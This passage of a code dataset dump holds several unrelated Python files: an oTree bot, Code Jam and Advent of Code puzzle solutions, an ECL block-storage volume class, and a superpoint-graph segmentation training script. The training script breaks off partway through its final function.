+{"seq_id":"19353195826","text":"from otree.api import Currency as c, currency_range\nfrom . 
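The Mininet topology script above parses `--model-dir=PATH` by hand from `sys.argv` and duplicates its usage message. A sketch of the same option handled by `argparse` (an alternative I am suggesting, not the repo's code; the path below is a placeholder):

```python
import argparse
import os

ap = argparse.ArgumentParser()
ap.add_argument("--model-dir", required=True, help="install dir containing bin/")
args = ap.parse_args(["--model-dir=/opt/p4/install"])   # stand-in for real argv
model_dir = os.path.join(args.model_dir, "bin")
print(model_dir)   # /opt/p4/install/bin
```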
import pages\nfrom ._builtin import Bot\nfrom .models import Constants\nimport random\n\n\nclass PlayerBot(Bot):\n\n def play_round(self):\n # print(\"Round:\" + str(self.round_number))\n\n fake_round = self.round_number <= self.player.session.config['fake_rounds'] and not self.participant.vars['fake_rounds_done']\n real_round = self.round_number == 1 and self.participant.vars['fake_rounds_done']\n max_price = self.player.session.config['max_price']\n if fake_round or real_round:\n if self.round_number == 1:\n yield (pages.Instructions1)\n yield (pages.Instructions2)\n\n group_prime = self.participant.vars['fake_rounds_done'] and \\\n self.session.config['assign_groups']\n\n if group_prime:\n yield (pages.GroupMug)\n\n if random.random() < 0.5:\n yield (pages.Bid, {'object_choice': 'Mug A', 'bid': random.randint(0, max_price)})\n else:\n yield (pages.Bid, {'object_choice': 'Mug B', 'bid': random.randint(0, max_price)})\n yield (pages.Auction)","repo_name":"wutherwalker/ANTISOCIAL","sub_path":"WTP/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23481474331","text":"import os\n\nfile_path_input = os.getcwd() + '/' + 'prob1.in'\nfile_path_output = os.getcwd() + '/' + 'prob1.out'\n\nwith open(file_path_output, 'wb') as output_data:\n\twith open(file_path_input, 'rb') as input_data:\n\t\t\tnum_cases = int(input_data.readline())\n\n\t\t\tfor i in range(num_cases):\n\t\t\t\tcheck_arr = [0]*10\n\t\t\t\t\n\t\t\t\tcurr_numStr = input_data.readline().decode()\n\t\t\t\tcurr_numInt = int(curr_numStr)\n\n\t\t\t\tif curr_numInt == 0:\n\t\t\t\t\tout_line = 'Case #' + str(i+1) + ': INSOMNIA'\n\t\t\t\t\toutput_data.write(out_line.encode())\n\t\t\t\t\toutput_data.write('\\n'.encode())\n\n\t\t\t\telse:\n\t\t\t\t\tmult = 2\n\t\t\t\t\tupdated_numInt = curr_numInt\n\t\t\t\t\twhile 0 in check_arr:\n\t\t\t\t\t\tcurr_numStr = list(str(updated_numInt))\n\n\t\t\t\t\t\tfor num in curr_numStr:\n\t\t\t\t\t\t\tcheck_arr[int(num)] = 1\n\n\t\t\t\t\t\tupdated_numInt = curr_numInt * mult\n\t\t\t\t\t\tmult += 1\n\n\t\t\t\t\tupdated_numInt -= curr_numInt\n\t\t\t\t\tout_line = 'Case #' + str(i+1) + ': ' + str(updated_numInt)\n\t\t\t\t\toutput_data.write(out_line.encode())\n\t\t\t\t\tif i != num_cases-1:\n\t\t\t\t\t\toutput_data.write('\\n'.encode())","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_177/2872.py","file_name":"2872.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23553431831","text":"# helper functions\n\ndef tidy_number(n):\n digits = [int(x) for x in str(n)]\n max_digit = 0\n for i in digits:\n if (i >= max_digit):\n max_digit = i\n else:\n return False\n\n return True\n\n\ndef scale_down(N):\n digits = [int(x) for x in str(N)]\n new = []\n\n for i in range(0, len(digits), 1):\n if (i == len(digits)-1):\n new.append(str(digits[i]))\n break\n\n if(digits[i] <= digits[i+1]):\n new.append(str(digits[i]))\n else:\n new.append(str(digits[i]-1))\n for i in range(len(digits)-(i+1)):\n new.append('9')\n break\n\n return (int(''.join(new)))\n\ndef find_max(N):\n while(True):\n if(tidy_number(N)):\n return N\n break\n else:\n N = scale_down(N)\n\n\n# input and output\nexamples_no = int(input()) # number of instances\nfor i in range(1, examples_no+1):\n n = int(input()) # input integer\n print(\"Case #{}: {}\".format(i, find_max(n)))\n # check out 
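The Code Jam "counting sheep" record that follows tracks seen digits with a ten-slot array and a manual multiplier loop. The same idea reads more directly with a set, stopping once all ten digits have appeared (my rephrasing of the record's algorithm):

```python
def last_number_seen(n):
    """Count N, 2N, 3N, ... until every digit 0-9 has appeared; return that multiple."""
    if n == 0:
        return None          # digits never change: INSOMNIA
    seen, k = set(), 0
    while len(seen) < 10:
        k += n
        seen.update(str(k))
    return k

print(last_number_seen(1692))   # 5076
```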
.format's specification for more formatting options\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/1711.py","file_name":"1711.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23760634397","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom ecl.block_store import block_store_service\nfrom ecl import format\nfrom ecl import resource\nfrom ecl import utils\n\n\nclass Volume(resource.Resource):\n resource_key = \"volume\"\n resources_key = \"volumes\"\n base_path = \"/volumes\"\n service = block_store_service.BlockStoreService()\n\n # capabilities\n allow_retrieve = True\n allow_create = True\n allow_delete = True\n allow_update = True\n allow_list = True\n\n # Properties\n #: A ID representing this volume.\n id = resource.prop(\"id\")\n #: The name of this volume.\n name = resource.prop(\"name\")\n #: A list of links associated with this volume. *Type: list*\n links = resource.prop(\"links\", type=list)\n\n #: The availability zone.\n availability_zone = resource.prop(\"availability_zone\")\n #: To create a volume from an existing volume, specify the ID of\n #: the existing volume. If specified, the volume is created with\n #: same size of the source volume.\n source_volume_id = resource.prop(\"source_volid\")\n #: The volume description.\n description = resource.prop(\"description\")\n #: To create a volume from an existing snapshot, specify the ID of\n #: the existing volume snapshot. If specified, the volume is created\n #: in same availability zone and with same size of the snapshot.\n snapshot_id = resource.prop(\"snapshot_id\")\n #: The size of the volume, in GBs. *Type: int*\n size = resource.prop(\"size\", type=int)\n #: The ID of the image from which you want to create the volume.\n #: Required to create a bootable volume.\n image_id = resource.prop(\"imageRef\")\n #: The name of the associated volume type.\n volume_type = resource.prop(\"volume_type\")\n #: Enables or disables the bootable attribute. You can boot an\n #: instance from a bootable volume. *Type: bool*\n is_bootable = resource.prop(\"bootable\", type=format.BoolStr)\n #: One or more metadata key and value pairs to associate with the volume.\n metadata = resource.prop(\"metadata\")\n\n #: One of the following values: creating, available, attaching, in-use\n #: deleting, error, error_deleting, backing-up, restoring-backup,\n #: error_restoring. 
For details on these statuses, see the\n #: Block Storage API documentation.\n status = resource.prop(\"status\")\n #: TODO(briancurtin): This is currently undocumented in the API.\n attachments = resource.prop(\"attachments\")\n #: The timestamp of this volume creation.\n created_at = resource.prop(\"created_at\")\n\n def _action(self, session, body):\n \"\"\"Preform server actions given the message body.\"\"\"\n # NOTE: This is using Server.base_path instead of self.base_path\n # as both Server and ServerDetail instances can be acted on, but\n # the URL used is sans any additional /detail/ part.\n url = utils.urljoin(Volume.base_path, self.id, 'action')\n headers = {'Accept': ''}\n return session.post(\n url, endpoint_filter=self.service, json=body, headers=headers)\n\n def extend_size(self, session, new_size):\n body = {\"os-extend\": {\"new_size\": new_size}}\n return self._action(session, body)\n\n def upload_to_image(self, session, container_format=None,\n disk_format=None,\n image_name=None, force=False):\n\n body = dict()\n if container_format:\n body.update({\"container_format\": container_format})\n if disk_format:\n body.update({\"disk_format\": disk_format})\n if force:\n body.update({\"force\": force})\n if image_name:\n body.update({\"image_name\": image_name})\n return self._action(session, {\"os-volume_upload_image\": body})\n\n def update_bootable(self, session, bootable=False):\n body = {\"os-set_bootable\": {\n \"bootable\": bootable\n }}\n return self._action(session, body)\n\n\nclass VolumeDetail(Volume):\n\n base_path = \"/volumes/detail\"\n\n #: The volume's current back-end.\n host = resource.prop(\"os-vol-host-attr:host\")\n #: The project ID associated with current back-end.\n project_id = resource.prop(\"os-vol-tenant-attr:tenant_id\")\n #: The status of this volume's migration (None means that a migration\n #: is not currently in progress).\n migration_status = resource.prop(\"os-vol-mig-status-attr:migstat\")\n #: The volume ID that this volume's name on the back-end is based on.\n migration_id = resource.prop(\"os-vol-mig-status-attr:name_id\")\n #: Status of replication on this volume.\n replication_status = resource.prop(\"replication_status\")\n #: Extended replication status on this volume.\n extended_replication_status = resource.prop(\n \"os-volume-replication:extended_status\")\n #: ID of the consistency group.\n consistency_group_id = resource.prop(\"consistencygroup_id\")\n #: Data set by the replication driver\n replication_driver_data = resource.prop(\n \"os-volume-replication:driver_data\")\n #: ``True`` if this volume is encrypted, ``False`` if not.\n #: *Type: bool*\n is_encrypted = resource.prop(\"encrypted\", type=format.BoolStr)\n","repo_name":"nttcom/eclsdk","sub_path":"ecl/block_store/v2/volume.py","file_name":"volume.py","file_ext":"py","file_size_in_byte":5664,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"39740582151","text":"import unittest\n\ndef parse_input(path_in):\n with open(path_in, 'r') as f:\n input = f.read().split()\n return (input,)\n\n####################### Day 10.1: Syntax Scoring #######################\nL = [\"(\", \"[\", \"{\", \"<\"]\nR = [\")\", \"]\", \"}\", \">\"]\nR2L = dict(zip(R, L))\nL_SET = frozenset(L)\nR_SET = frozenset(R)\n\ndef part1(input):\n scores = dict(zip(R, [3, 57, 1197, 25137]))\n total_score = 0\n for line in input:\n stack = [] # Maintain all left symbols.\n for char in line:\n if char in L_SET:\n stack.append(char)\n else:\n assert 
char in R_SET\n if stack.pop() != R2L[char]:\n # Corrupted line\n total_score += scores[char]\n break\n return total_score\n\ndef solve_part1():\n input = parse_input(\"input10.txt\")\n return part1(*input)\n\nclass Part1Test(unittest.TestCase):\n def setUp(self):\n if FUNC_TO_TEST != \"part1\":\n self.skipTest(f\"Testing: {FUNC_TO_TEST}()\")\n \n def test_part1(self):\n cases = [\"input10_test.txt\"]\n expecteds = [26397]\n for case, expected in zip(cases, expecteds):\n with self.subTest(case=case):\n actual = part1(*parse_input(case))\n self.assertEqual(expected, actual)\n\n####################### Day 10.2: Syntax Scoring #######################\ndef get_median(L):\n return sorted(L)[len(L) // 2] # Favors right in case of tie (len is even).\n\ndef part2(input):\n L_to_score = dict(zip(L, [1, 2, 3, 4]))\n score_multiplier = 5\n scores = []\n for line in input:\n stack = [] # Maintain all left symbols.\n corrupted = False\n for char in line:\n if char in L_SET:\n stack.append(char)\n else:\n assert char in R_SET\n if stack.pop() != R2L[char]:\n corrupted = True\n break # Corrupted line\n \n if corrupted or len(stack) == 0: # Empty stack = complete line\n continue\n \n # If got here, must be incomplete line.\n cur_score = 0\n while len(stack):\n cur_score = (cur_score * score_multiplier) + L_to_score[stack.pop()]\n scores.append(cur_score)\n \n return get_median(scores)\n\ndef solve_part2():\n input = parse_input(\"input10.txt\")\n return part2(*input)\n\nclass Part2Test(unittest.TestCase):\n def setUp(self):\n if FUNC_TO_TEST != \"part2\":\n self.skipTest(f\"Testing: {FUNC_TO_TEST}()\")\n \n def test_part2(self):\n cases = [\"input10_test.txt\"]\n expecteds = [288957]\n for case, expected in zip(cases, expecteds):\n with self.subTest(case=case):\n actual = part2(*parse_input(case))\n self.assertEqual(expected, actual)\n\n############################### Main ###############################\nFUNC_TO_TEST = \"part2\"\n\nif __name__ == \"__main__\":\n # unittest.main()\n print(eval(f\"solve_{FUNC_TO_TEST}\")())\n","repo_name":"wxiang54/advent-of-code","sub_path":"2021/10/q10.py","file_name":"q10.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14671506318","text":"import os\nimport sys\nimport ast\nimport math\nimport time\nimport random\nimport logging\nimport argparse\n\nsys.path.append(os.path.join('/opt/conda/envs/ALVE-3D/lib/python3.10/site-packages/'))\n\nimport json\nimport h5py\nimport torch\nimport wandb\nimport numpy as np\nfrom tqdm import tqdm\nimport torchnet as tnt\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '../..'))\n\nfrom src.models.pointnet import PointNet\nfrom src.superpoints.graph import compute_sp_graph, create_s3dis_datasets, graph_collate\nfrom src.superpoints.provider import perfect_prediction, write_spg\n\nfrom src.superpoints.metrics import compute_boundary_precision, compute_boundary_recall, ConfusionMatrix\nfrom src.superpoints.losses import compute_weight_loss, compute_partition, relax_edge_binary, compute_loss, compute_dist\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Large-scale Point Cloud Semantic Segmentation with Superpoint Graphs')\n\n # Dataset\n parser.add_argument('--dataset', default='s3dis', help='Dataset name: sema3d|s3dis|vkitti')\n parser.add_argument('--cvfold', 
default=1, type=int,\n help='Fold left-out for testing in leave-one-out setting (S3DIS)')\n parser.add_argument('--resume', default='', help='Loads a previously saved model.')\n parser.add_argument('--db_train_name', default='trainval', help='Training set (Sema3D)')\n parser.add_argument('--db_test_name', default='testred', help='Test set (Sema3D)')\n parser.add_argument('--ROOT_PATH', default='data/S3DIS')\n parser.add_argument('--odir', default='models/pretrained', help='folder for saving the trained model')\n parser.add_argument('--spg_out', default=1, type=int,\n help='whether to compute the SPG for linking with the SPG semantic segmentation method')\n\n # Learning process arguments\n parser.add_argument('--cuda', default=1, type=int, help='Bool, use cuda')\n parser.add_argument('--nworkers', default=0, type=int,\n help='Num subprocesses to use for data loading. '\n '0 means that the data will be loaded in the main process')\n parser.add_argument('--test_nth_epoch', default=10, type=int, help='Test each n-th epoch during training')\n parser.add_argument('--save_nth_epoch', default=1, type=int, help='Save model each n-th epoch during training')\n parser.add_argument('--test_multisamp_n', default=10, type=int,\n help='Average logits obtained over runs with different seeds')\n # Optimization arguments\n parser.add_argument('--wd', default=0, type=float, help='Weight decay')\n parser.add_argument('--lr', default=1e-2, type=float, help='Initial learning rate')\n parser.add_argument('--lr_decay', default=0.7, type=float,\n help='Multiplicative factor used on learning rate at `lr_steps`')\n parser.add_argument('--lr_steps', default='[20,35,45]',\n help='List of epochs where the learning rate is decreased by `lr_decay`')\n parser.add_argument('--momentum', default=0.9, type=float, help='Momentum')\n parser.add_argument('--epochs', default=50, type=int,\n help='Number of epochs to train. If <=0, only testing will be done.')\n parser.add_argument('--batch_size', default=3, type=int, help='Batch size')\n parser.add_argument('--optim', default='adam', help='Optimizer: sgd|adam')\n parser.add_argument('--grad_clip', default=1, type=float,\n help='Element-wise clipping of gradient. If 0, does not clip')\n # Point cloud processing\n parser.add_argument('--pc_attribs', default='',\n help='Point attributes fed to PointNets, if empty then all possible.')\n parser.add_argument('--pc_augm_scale', default=2, type=float,\n help='Training augmentation: Uniformly random scaling in [1/scale, scale]')\n parser.add_argument('--pc_augm_rot', default=1, type=int,\n help='Training augmentation: Bool, random rotation around z-axis')\n parser.add_argument('--pc_augm_mirror_prob', default=0, type=float,\n help='Training augmentation: Probability of mirroring about x or y axes')\n parser.add_argument('--pc_augm_jitter', default=1, type=int,\n help='Training augmentation: Bool, Gaussian jittering of all attributes')\n # Point net\n parser.add_argument('--ptn_embedding', default='ptn',\n help='configuration of the learned cloud embedder (ptn): uses PointNets '\n 'for vertex embeddings. 
No other options so far :)')\n parser.add_argument('--ptn_widths', default='[[32,128], [34,32,32,4]]', help='PointNet widths')\n parser.add_argument('--ptn_widths_stn', default='[[16,64],[32,16]]', help='PointNet\\'s Transformer widths')\n parser.add_argument('--use_color', default='rgb',\n help='How to use color in the local cloud embedding : rgb, lab or no')\n parser.add_argument('--ptn_nfeat_stn', default=2, type=int, help='PointNet\\'s Transformer number of input features')\n parser.add_argument('--ptn_prelast_do', default=0, type=float)\n parser.add_argument('--ptn_norm', default='batch',\n help='Type of norm layers in PointNets, \"batch\" or \"layer\" or \"group\"')\n parser.add_argument('--ptn_n_group', default=2, type=int,\n help='Number of groups in groupnorm. Only compatible with ptn_norm=group')\n parser.add_argument('--stn_as_global', default=1, type=int,\n help='Whether to use the STN output as a global variable')\n parser.add_argument('--global_feat', default='eXYrgb', help='Use rgb to embed points')\n parser.add_argument('--use_rgb', default=1, type=int,\n help='Whether to use the radiometry value for cloud embedding')\n parser.add_argument('--ptn_mem_monger', default=0, type=int,\n help='Bool, save GPU memory by recomputing PointNets in back propagation.')\n\n # Loss\n parser.add_argument('--loss_weight', default='crosspartition',\n help='[none, proportional, sqrt, seal, crosspartition] which loss weighting scheme to choose '\n 'to train the model. unweighted: use classic cross_entropy loss, proportional: '\n 'weight inversely by transition count, SEAL: use SEAL loss as proposed in '\n 'https://jankautz.com/publications/LearningSuperpixels_CVPR2018.pdf, crosspartition : '\n 'our crosspartition weighting scheme')\n parser.add_argument('--loss', default='TVH_zhang',\n help='Structure of the loss : first term for intra edge (choose from: tv, laplacian, '\n 'TVH (pseudo-huber)), second one for interedge (choose from: zhang, scad, tv)')\n parser.add_argument('--transition_factor', default=5, type=float,\n help='Weight for transition edges in the graph structured contrastive loss')\n parser.add_argument('--dist_type', default='euclidian',\n help='[euclidian, intrisic, scalar] How to measure the distance between embeddings')\n\n # Graph-Clustering\n parser.add_argument('--ver_value', default='ptn',\n help='what value to use for vertices (ptn): uses PointNets, (geof) : '\n 'uses geometric features, (xyz) uses position, (rgb) uses color')\n parser.add_argument('--max_ver_train', default=1e3, type=int,\n help='Size of the subgraph taken in each point cloud for the training')\n parser.add_argument('--k_nn_adj', default=5, type=int, help='number of neighbors for the adjacency graph')\n parser.add_argument('--k_nn_local', default=20, type=int, help='number of neighbors to describe the local geometry')\n parser.add_argument('--reg_strength', default=0.1, type=float,\n help='Regularization strength of the generalized minimum partition problem.')\n parser.add_argument('--CP_cutoff', default=25, type=int,\n help='Minimum accepted component size in cut pursuit. '\n 'If negative, chosen with respect to this number '\n 'and the reg_strength as explained in the paper')\n parser.add_argument('--spatial_emb', default=0.2, type=float,\n help='Weight of xyz in the spatial embedding. When 0 : no xyz')\n parser.add_argument('--edge_weight_threshold', default=-0.5, type=float,\n help='Edge weight value when diff>1. 
'\n 'if negative, then switch to weight = exp(-diff * edge_weight_threshold)')\n\n # Metrics\n parser.add_argument('--BR_tolerance', default=1, type=int,\n help='How far an edge must be from an actual transition to be considered a true positive')\n\n args = parser.parse_args()\n\n args.start_epoch = 0\n args.lr_steps = ast.literal_eval(args.lr_steps)\n args.ptn_widths = ast.literal_eval(args.ptn_widths)\n args.ptn_widths_stn = ast.literal_eval(args.ptn_widths_stn)\n args.learned_embeddings = ('ptn' in args.ver_value) or args.ver_value == 'xyz'\n if args.CP_cutoff < 0: # adaptive cutoff: strong regularization will set a larger cutoff\n args.CP_cutoff = int(max(-args.CP_cutoff / 2, -args.CP_cutoff / 2 * np.log(args.reg_strength) - args.CP_cutoff))\n\n return args\n\n\nclass FolderHierarchy:\n SPG_FOLDER = \"superpoint_graphs\"\n EMBEDDINGS_FOLDER = \"embeddings\"\n SCALAR_FOLDER = \"scalars\"\n MODEL_FILE = \"model.pth.tar\"\n\n def __init__(self, output_dir, dataset_name, root_dir, cv_fold):\n self._root = root_dir\n if dataset_name == 's3dis':\n self._output_dir = os.path.join(output_dir, 'cv' + str(cv_fold))\n self._folders = [\"Area_1/\", \"Area_2/\", \"Area_3/\", \"Area_4/\", \"Area_5/\", \"Area_6/\"]\n elif dataset_name == 'sema3d':\n self._output_dir = os.path.join(output_dir, 'best')\n self._folders = [\"train/\", \"test_reduced/\", \"test_full/\"]\n elif dataset_name == 'vkitti':\n self._output_dir = os.path.join(output_dir, 'cv' + str(cv_fold))\n self._folders = [\"01/\", \"02/\", \"03/\", \"04/\", \"05/\", \"06/\"]\n\n os.makedirs(self._output_dir, exist_ok=True)\n\n self._spg_folder = self._create_folder(self.SPG_FOLDER)\n self._emb_folder = self._create_folder(self.EMBEDDINGS_FOLDER)\n self._scalars = self._create_folder(self.SCALAR_FOLDER)\n\n @property\n def output_dir(self):\n return self._output_dir\n\n @property\n def emb_folder(self):\n return self._emb_folder\n\n @property\n def spg_folder(self):\n return self._spg_folder\n\n @property\n def scalars(self):\n return self._scalars\n\n @property\n def model_path(self):\n return os.path.join(self._output_dir, self.MODEL_FILE)\n\n def _create_folder(self, property_name):\n folder = os.path.join(self._root, property_name)\n if not os.path.isdir(folder):\n os.makedirs(folder, exist_ok=True)\n return folder\n\n\ndef main(args: argparse.Namespace):\n stats = []\n random.seed(0)\n with wandb.init(project='Evaluate partitioning'):\n root = os.path.join(args.ROOT_PATH)\n folder_hierarchy = FolderHierarchy(args.odir, args.dataset, root, args.cvfold)\n\n dbinfo = get_s3dis_info()\n\n # Create the datasets\n print('Creating datasets...')\n train_ds, val_ds = create_s3dis_datasets(args)\n print(f'Train dataset size: {len(train_ds)}')\n print(f'Val dataset size: {len(val_ds)}')\n\n train_loader = DataLoader(train_ds, batch_size=args.batch_size, collate_fn=graph_collate,\n num_workers=args.nworkers,\n shuffle=True, drop_last=True)\n val_loader = DataLoader(val_ds, batch_size=1, collate_fn=graph_collate, num_workers=args.nworkers,\n shuffle=False, drop_last=False)\n\n model = PointNet(num_features=6, num_global_features=7, out_features=4)\n model.to(device)\n\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.wd)\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=args.lr_steps,\n gamma=args.lr_decay, last_epoch=args.start_epoch - 1)\n\n def train():\n model.train()\n\n loss_meter = tnt.meter.AverageValueMeter()\n n_clusters_meter = tnt.meter.AverageValueMeter()\n\n t0 = time.time()\n\n for bidx, 
(fname, edg_source, edg_target, is_transition, labels, objects, clouds_data, xyz) in enumerate(\n tqdm(train_loader)):\n\n # Move to device\n clouds, clouds_global, nei = clouds_data\n is_transition = is_transition.to(device)\n objects = objects.to(device)\n clouds = clouds.to(device)\n clouds_global = clouds_global.to(device)\n\n t_loader = 1000 * (time.time() - t0)\n optimizer.zero_grad()\n t0 = time.time()\n\n # Compute embeddings\n embeddings = model(clouds, clouds_global)\n print(f'embedding shape: {embeddings.shape}')\n\n # Compute loss\n diff = compute_dist(embeddings, edg_source, edg_target, args.dist_type)\n weights_loss, pred_comp, in_comp = compute_weight_loss(args, embeddings, objects, edg_source,\n edg_target,\n is_transition, diff, True, xyz)\n loss1, loss2 = compute_loss(args, diff, is_transition, weights_loss)\n\n wandb.log({\"First Loss - train\": loss1.item(), \"Second Loss - train\": loss2.item()})\n\n factor = 1000 # scaling for better usage of float precision\n\n loss = (loss1 + loss2) / weights_loss.shape[0] * factor\n\n loss.backward()\n\n if args.grad_clip > 0:\n for p in model.parameters():\n p.grad.data.clamp_(-args.grad_clip * factor, args.grad_clip * factor)\n\n optimizer.step()\n\n t_trainer = 1000 * (time.time() - t0)\n loss_meter.add(loss.item() / factor) # /weights_loss.mean().item())\n n_clusters_meter.add(embeddings.shape[0] / len(pred_comp))\n\n logging.debug('Batch loss %f, Loader time %f ms, Trainer time %f ms.', loss.item() / factor, t_loader,\n t_trainer)\n\n wandb.log({\"Batch loss - train\": loss.item() / factor, \"Loader time - train\": t_loader,\n \"Trainer time - train\": t_trainer})\n\n t0 = time.time()\n\n wandb.log({\"Epoch loss - train\": loss_meter.value()[0],\n \"Epoch n_clusters - train\": n_clusters_meter.value()[0]})\n\n return loss_meter.value()[0], n_clusters_meter.value()[0]\n\n def evaluate():\n \"\"\" Evaluated model on test set \"\"\"\n model.eval()\n\n with torch.no_grad():\n\n loss_meter = tnt.meter.AverageValueMeter()\n n_clusters_meter = tnt.meter.AverageValueMeter()\n BR_meter = tnt.meter.AverageValueMeter()\n BP_meter = tnt.meter.AverageValueMeter()\n CM_classes = ConfusionMatrix(dbinfo['classes'])\n\n # iterate over dataset in batches\n for bidx, (\n fname, edg_source, edg_target, is_transition, labels, objects, clouds_data, xyz) in enumerate(\n tqdm(val_loader)):\n\n # Move to device\n clouds, clouds_global, nei = clouds_data\n is_transition = is_transition.to(device)\n objects = objects.to(device)\n clouds = clouds.to(device)\n clouds_global = clouds_global.to(device)\n\n embeddings = model(clouds, clouds_global)\n\n diff = compute_dist(embeddings, edg_source, edg_target, args.dist_type)\n\n if len(is_transition) > 1:\n weights_loss, pred_components, pred_in_component = compute_weight_loss(args, embeddings,\n objects,\n edg_source, edg_target,\n is_transition, diff,\n True,\n xyz)\n loss1, loss2 = compute_loss(args, diff, is_transition, weights_loss)\n loss = (loss1 + loss2) / weights_loss.shape[0]\n pred_transition = pred_in_component[edg_source] != pred_in_component[edg_target]\n per_pred = perfect_prediction(pred_components, labels)\n CM_classes.count_predicted_batch(labels[:, 1:], per_pred)\n else:\n loss = 0\n\n if len(is_transition) > 1:\n loss_meter.add(loss.item()) # /weights_loss.sum().item())\n is_transition = is_transition.cpu().numpy()\n n_clusters_meter.add(len(pred_components))\n BR_meter.add((is_transition.sum()) * compute_boundary_recall(is_transition,\n relax_edge_binary(pred_transition,\n edg_source,\n 
edg_target,\n xyz.shape[0],\n args.BR_tolerance)),\n n=is_transition.sum())\n BP_meter.add((pred_transition.sum()) * compute_boundary_precision(\n relax_edge_binary(is_transition, edg_source, edg_target, xyz.shape[0], args.BR_tolerance),\n pred_transition), n=pred_transition.sum())\n CM = CM_classes.confusion_matrix\n return loss_meter.value()[0], n_clusters_meter.value()[0], 100 * CM.trace() / CM.sum(), BR_meter.value()[0], \\\n BP_meter.value()[0]\n\n def evaluate_final():\n \"\"\" Evaluated model on test set \"\"\"\n\n print(\"Final evaluation\")\n model.eval()\n\n loss_meter = tnt.meter.AverageValueMeter()\n n_clusters_meter = tnt.meter.AverageValueMeter()\n confusion_matrix_classes = ConfusionMatrix(dbinfo['classes'])\n confusion_matrix_BR = ConfusionMatrix(2)\n confusion_matrix_BP = ConfusionMatrix(2)\n\n with torch.no_grad():\n\n # iterate over dataset in batches\n for bidx, (\n fname, edg_source, edg_target, is_transition, labels, objects, clouds_data, xyz) in enumerate(\n tqdm(val_loader)):\n\n # Move to device\n clouds, clouds_global, nei = clouds_data\n is_transition = is_transition.to(device, non_blocking=True)\n objects = objects.to(device, non_blocking=True)\n clouds = clouds.to(device, non_blocking=True)\n clouds_global = clouds_global.to(device, non_blocking=True)\n\n embeddings = model(clouds, clouds_global)\n\n diff = compute_dist(embeddings, edg_source, edg_target, args.dist_type)\n\n pred_components, pred_in_component = compute_partition(args, embeddings, edg_source, edg_target,\n diff,\n xyz)\n\n if len(is_transition) > 1:\n pred_transition = pred_in_component[edg_source] != pred_in_component[edg_target]\n is_transition = is_transition.cpu().numpy()\n\n n_clusters_meter.add(len(pred_components))\n\n per_pred = perfect_prediction(pred_components, labels)\n confusion_matrix_classes.count_predicted_batch(labels[:, 1:], per_pred)\n confusion_matrix_BR.count_predicted_batch_hard(is_transition,\n relax_edge_binary(pred_transition, edg_source,\n edg_target, xyz.shape[0],\n args.BR_tolerance).astype(\n 'uint8'))\n confusion_matrix_BP.count_predicted_batch_hard(\n relax_edge_binary(is_transition, edg_source, edg_target, xyz.shape[0], args.BR_tolerance),\n pred_transition.astype('uint8'))\n\n if args.spg_out:\n graph_sp = compute_sp_graph(xyz, 100, pred_in_component, pred_components, labels,\n dbinfo[\"classes\"])\n spg_file = os.path.join(folder_hierarchy.spg_folder, fname[0])\n if not os.path.exists(os.path.dirname(spg_file)):\n os.makedirs(os.path.dirname(spg_file))\n try:\n os.remove(spg_file)\n except OSError:\n pass\n write_spg(spg_file, graph_sp, pred_components, pred_in_component)\n\n # Debugging purpose - write the embedding file and an exemple of scalar files\n # if bidx % 0 == 0:\n # embedding2ply(os.path.join(folder_hierarchy.emb_folder , fname[0][:-3] + '_emb.ply'), xyz, embeddings.detach().cpu().numpy())\n # scalar2ply(os.path.join(folder_hierarchy.scalars , fname[0][:-3] + '_elevation.ply') , xyz, clouds_data[1][:,1].cpu())\n # edg_class = is_transition + 2*pred_transition\n # edge_class2ply2(os.path.join(folder_hierarchy.emb_folder , fname[0][:-3] + '_transition.ply'), edg_class, xyz, edg_source, edg_target)\n\n if len(is_transition) > 1:\n res_name = folder_hierarchy.output_dir + '/res.h5'\n res_file = h5py.File(res_name, 'w')\n res_file.create_dataset('confusion_matrix_classes'\n , data=confusion_matrix_classes.confusion_matrix, dtype='uint64')\n res_file.create_dataset('confusion_matrix_BR'\n , data=confusion_matrix_BR.confusion_matrix, dtype='uint64')\n 
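# Persisting the raw confusion matrices (classes, BR, BP) alongside the cluster count lets the partition metrics be recomputed offline without rerunning inference.\n 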
